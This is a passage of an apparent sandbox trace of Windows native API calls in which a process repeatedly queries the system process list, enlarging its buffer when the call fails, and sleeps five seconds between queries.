RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.183] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.201] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.246] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.366] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) 